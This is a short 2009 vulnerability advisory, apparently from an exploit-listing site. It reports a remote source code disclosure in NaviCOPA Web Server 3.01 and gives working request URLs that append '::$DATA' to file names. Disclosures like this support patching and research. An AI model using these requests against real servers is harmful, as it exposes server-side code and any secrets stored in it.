NaviCOPA web server version 3.01 remote source code disclosure

2009.09.17

Credit: Dr_IDE

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

#################################################################################
#
# NaviCOPA Web Server 3.01 Remote Source Code Disclosure
# Found By:		Dr_IDE
# Tested On:	Windows XPSP3
#
#################################################################################

- Description -

NaviCOPA Web Server 3.01 is a Windows based HTTP server. This is the latest version of
the application available. 

NaviCOPA is vulnerable to remote arbitrary source code disclosure by the following means.

- Technical Details -

	http://[ webserver IP]/[ file ][::$DATA]
	
	http://172.16.2.101/index.html::$DATA

	http://172.16.2.101/default.asp::$DATA

	http://172.16.2.101/index.php::$DATA

See this note in RAW Version

Vote for this issue:

50%

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

NaviCOPA web server version 3.01 remote source code disclosure

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

NaviCOPA web server version 3.01 remote source code disclosure

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.